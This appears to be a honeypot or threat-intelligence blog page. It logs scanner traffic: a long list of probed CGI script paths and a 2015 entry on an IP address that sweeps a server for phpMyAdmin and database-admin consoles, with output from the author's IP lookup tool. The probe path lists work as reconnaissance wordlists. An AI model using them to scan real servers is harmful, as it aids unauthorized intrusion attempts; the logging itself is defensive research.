GET /cgi-bin/sat-ir-web.pl HTTP/1.0
GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0
GET /cgi-bin/scoadminreg.cgi HTTP/1.0
GET /cgi-bin-sdb/printenv HTTP/1.0
GET /cgi-bin/search HTTP/1.0
GET /cgi-bin/search.cgi HTTP/1.0
GET /cgi-bin/search/search.cgi HTTP/1.0
GET /cgi-bin/sendform.cgi HTTP/1.0
GET /cgi-bin/shop.cgi HTTP/1.0
GET /cgi-bin/shopper.cgi HTTP/1.0
GET /cgi-bin/shopplus.cgi HTTP/1.0
GET /cgi-bin/showcheckins.cgi HTTP/1.0
GET /cgi-bin/signon.cgi HTTP/1.0
GET /cgi-bin/simplestguest.cgi HTTP/1.0
GET /cgi-bin/simplestmail.cgi HTTP/1.0
GET /cgi-bin/smartsearch.cgi HTTP/1.0
GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0
GET /cgi-bin/snorkerz.bat HTTP/1.0
GET /cgi-bin/snorkerz.cmd HTTP/1.0
GET /cgi-bin/sojourn.cgi HTTP/1.0
GET /cgi-bin/spin_client.cgi HTTP/1.0
GET /cgi-bin/start.cgi HTTP/1.0
GET /cgi-bin/status HTTP/1.0
GET /cgi-bin/status/status.cgi HTTP/1.0
GET /cgi-bin/store/agora.cgi HTTP/1.0
GET /cgi-bin/store.cgi HTTP/1.0
GET /cgi-bin/store/index.cgi HTTP/1.0
GET /cgi-bin/survey.cgi HTTP/1.0
GET /cgi-bin/talkback.cgi HTTP/1.0
GET /cgi-bin/technote/main.cgi HTTP/1.0
GET /cgi-bin/test2.pl HTTP/1.0
GET /cgi-bin/test-cgi HTTP/1.0
GET /cgi-bin/test.cgi HTTP/1.0
GET /cgi-bin/test-cgi.pl HTTP/1.0
GET /cgi-bin/testing_whatever HTTP/1.0
GET /cgi-bin/test.sh HTTP/1.0
GET /cgi-bin/test/test.cgi HTTP/1.0
GET /cgi-bin/tidfinder.cgi HTTP/1.0
GET /cgi-bin/tigvote.cgi HTTP/1.0
GET /cgi-bin/title.cgi HTTP/1.0
GET /cgi-bin/tools/tools.pl HTTP/1.0
GET /cgi-bin/traffic.cgi HTTP/1.0
GET /cgi-bin/tree.php HTTP/1.0
GET /cgi-bin/troops.cgi HTTP/1.0
GET /cgi-bin/ttawebtop.cgi/ HTTP/1.0
GET /cgi-bin/ultraboard.cgi HTTP/1.0
GET /cgi-bin/upload.cgi HTTP/1.0
GET /cgi-bin/urlcount.cgi HTTP/1.0
GET /cgi-bin/viewcvs.cgi HTTP/1.0
GET /cgi-bin/viralator.cgi HTTP/1.0
GET /cgi-bin/virgil.cgi HTTP/1.0
GET /cgi-bin/vote.cgi HTTP/1.0
GET /cgi-bin/vpasswd.cgi HTTP/1.0
GET /cgi-bin/w3mman2html.cgi HTTP/1.0
GET /cgi-bin/way-board.cgi HTTP/1.0
GET /cgi-bin/way-board/way-board.cgi HTTP/1.0
GET /cgi-bin/webbbs.cgi HTTP/1.0
GET /cgi-bin/webcart/webcart.cgi HTTP/1.0
GET /cgi-bin/webdist.cgi HTTP/1.0
GET /cgi-bin/webif.cgi HTTP/1.0
GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0
GET /cgi-bin/webmap.cgi HTTP/1.0
GET /cgi-bin/webspirs.cgi HTTP/1.0
GET /cgi-bin/whois.cgi HTTP/1.0
GET /cgi-bin/whois_raw.cgi HTTP/1.0
GET /cgi-bin/whois/whois.cgi HTTP/1.0
GET /cgi-bin/wrap HTTP/1.0
GET /cgi-bin/wrap.cgi HTTP/1.0
GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0
GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0
GET /cgi-bin/zml.cgi HTTP/1.0
GET /cgi-mod/index.cgi HTTP/1.0
GET /cgistart HTTP/1.0
GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0
GET /cgi-sys/addalink.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/domainredirect.cgi HTTP/1.0
GET /cgi-sys/entropybanner.cgi HTTP/1.0
GET /cgi-sys/entropysearch.cgi HTTP/1.0
GET /cgi-sys/FormMail-clone.cgi HTTP/1.0
GET /cgi-sys/guestbook.cgi HTTP/1.0
GET /cgi-sys/helpdesk.cgi HTTP/1.0
GET /cgi-sys/mchat.cgi HTTP/1.0
GET /cgi-sys/php5? HTTP/1.0
GET /cgi-sys/randhtml.cgi HTTP/1.0
GET /cgi-sys/realhelpdesk.cgi HTTP/1.0
GET /cgi-sys/realsignup.cgi HTTP/1.0
GET /cgi-sys/signup.cgi HTTP/1.0
GET /cgi-sys/suspendedpage.cgi HTTP/1.0
GET /connector.cgi HTTP/1.0
GET /cp/rac/nsManager.cgi HTTP/1.0
GET /create_release.sh HTTP/1.0
GET /CSNews.cgi HTTP/1.0
GET /csPassword.cgi HTTP/1.0
GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0
GET /dcadmin.cgi HTTP/1.0
GET /dcboard.cgi HTTP/1.0
GET /dcforum.cgi HTTP/1.0
GET /dcforum/dcforum.cgi HTTP/1.0
GET /debug.cgi HTTP/1.0
GET /details.cgi HTTP/1.0
GET /download.cgi HTTP/1.0
GET /edittag/edittag.cgi HTTP/1.0
GET /emumail.cgi HTTP/1.0
GET /enter_bug.cgi HTTP/1.0
GET /ez2000/ezadmin.cgi HTTP/1.0
GET /ez2000/ezboard.cgi HTTP/1.0
GET /ez2000/ezman.cgi HTTP/1.0
GET /fcgi-bin/echo HTTP/1.0
GET /fcgi-bin/echo2 HTTP/1.0
GET /gitweb/ HTTP/1.0
GET /gitweb.cgi HTTP/1.0
GET /gitweb/gitweb.cgi HTTP/1.0
GET /Gozila.cgi HTTP/1.0
GET /hitmatic/analyse.cgi HTTP/1.0
GET /hndUnblock.cgi HTTP/1.0
GET /html/cgi-bin/cgicso HTTP/1.0
GET /index.cgi HTTP/1.0
GET /info.cgi HTTP/1.0
GET /infosrch.cgi HTTP/1.0
GET /left.cgi HTTP/1.0
GET /login.cgi HTTP/1.0
GET /mailview.cgi HTTP/1.0
GET /main.cgi HTTP/1.0
GET /megabook/admin.cgi HTTP/1.0
GET /ministats/admin.cgi HTTP/1.0
GET /mods/apage/apage.cgi HTTP/1.0
GET /_mt/mt.cgi HTTP/1.0
GET /musicqueue.cgi HTTP/1.0
GET /ncbook.cgi HTTP/1.0
GET /newpro.cgi HTTP/1.0
GET /newsletter.sh HTTP/1.0
GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0
GET /page.cgi HTTP/1.0
GET /parse_xml.cgi HTTP/1.0
GET /photodata/manage.cgi HTTP/1.0
GET /photo/manage.cgi HTTP/1.0
GET /phppath/cgi_wrapper HTTP/1.0
GET /phppath/cgi_wrapper? HTTP/1.0
GET /phppath/php HTTP/1.0
GET /phppath/php? HTTP/1.0
GET /print.cgi HTTP/1.0
GET /process_bug.cgi HTTP/1.0
GET /pub/english.cgi HTTP/1.0
GET /quikmail/nph-emumail.cgi HTTP/1.0
GET /quikstore.cgi HTTP/1.0
GET /redirects/redir.cgi HTTP/1.0
GET /reviews/newpro.cgi HTTP/1.0
GET /ROADS/cgi-bin/search.pl HTTP/1.0
GET /sample01.cgi HTTP/1.0
GET /sample02.cgi HTTP/1.0
GET /sample03.cgi HTTP/1.0
GET /sample04.cgi HTTP/1.0
GET /sampleposteddata.cgi HTTP/1.0
GET /scancfg.cgi HTTP/1.0
GET /servers/link.cgi HTTP/1.0
GET /setpasswd.cgi HTTP/1.0
GET /SetSecurity.shm HTTP/1.0
GET /shop/member_html.cgi HTTP/1.0
GET /shop/normal_html.cgi HTTP/1.0
GET /site_searcher.cgi HTTP/1.0
GET /siteUserMod.cgi HTTP/1.0
GET /submit.cgi HTTP/1.0
GET /sys-cgi HTTP/1.0
GET /technote/print.cgi HTTP/1.0
GET /template.cgi HTTP/1.0
GET /test.cgi HTTP/1.0
GET /tmUnblock.cgi HTTP/1.0
GET /upload.cgi HTTP/1.0
GET /userreg.cgi HTTP/1.0
GET /users/scripts/submit.cgi HTTP/1.0
GET /Web_Store/web_store.cgi HTTP/1.0
GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0
GET /webtools/bonsai/cvsblame.cgi HTTP/1.0
GET /webtools/bonsai/cvslog.cgi HTTP/1.0
GET /webtools/bonsai/cvsquery.cgi HTTP/1.0
GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0
GET /webtools/bonsai/showcheckins.cgi HTTP/1.0
GET /wwwadmin.cgi HTTP/1.0
GET /wwwboard.cgi HTTP/1.0
GET /wwwboard/wwwboard.cgi HTTP/1.0
GET /xul/ HTTP/1.0

Mittwoch, 9. September 2015

Checking Database config - 202.137.205.134

BEGIN OF HTTP DATA:
2015-09-09 01:48:57
Source IP: 202.137.205.134
Country: AU RiskScore: 1 Malware: []
HEAD http://195.169.125.87:80/PMA2011/ HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
User-Agent: Mozilla/5.0 Jorgee
Host: 195.169.125.87
The IP made several tries to access database related access console.
So, time to show the new tool :-)
 python.exe .\spider.py -i 202.137.205.134
<?xml version="1.0" encoding="UTF-8"?>
<ip>202.137.205.134
<reporter>SANS Internet Storm Cast</reporter>
<comment>IP is listed on SANS ISC</comment>
<reference>https://isc.sans.edu/api/ip/202.137.205.134</reference>
</reporter>
</ip>
HEAD http://195.169.125.87:80/1phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/2phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/3phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/4phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/MyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2011/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2012/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2013/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2014/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2015/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/db/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/pMA/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/sqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/sysadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/web/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/PMA/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/db/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/web/ HTTP/1.1
HEAD http://195.169.125.87:80/database/ HTTP/1.1
HEAD http://195.169.125.87:80/db/ HTTP/1.1
HEAD http://195.169.125.87:80/db/db-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/dbweb/ HTTP/1.1
HEAD http://195.169.125.87:80/db/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin-3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/webadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/webdb/ HTTP/1.1
HEAD http://195.169.125.87:80/db/websql/ HTTP/1.1
HEAD http://195.169.125.87:80/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/myadminphp/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/db/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/mysqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/pMA/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/sqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/web/ HTTP/1.1
HEAD http://195.169.125.87:80/mysqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/php-my-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/php-myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-4/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmy-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmy/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin1/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/phppma/ HTTP/1.1
HEAD http://195.169.125.87:80/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2011/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2012/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2013/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2014/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2015/ HTTP/1.1
HEAD http://195.169.125.87:80/program/ HTTP/1.1
HEAD http://195.169.125.87:80/shopdb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/php-myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmy-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sql-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sql/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sqlweb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/webadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/webdb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/websql/ HTTP/1.1
HEAD http://195.169.125.87:80/sqlmanager/ HTTP/1.1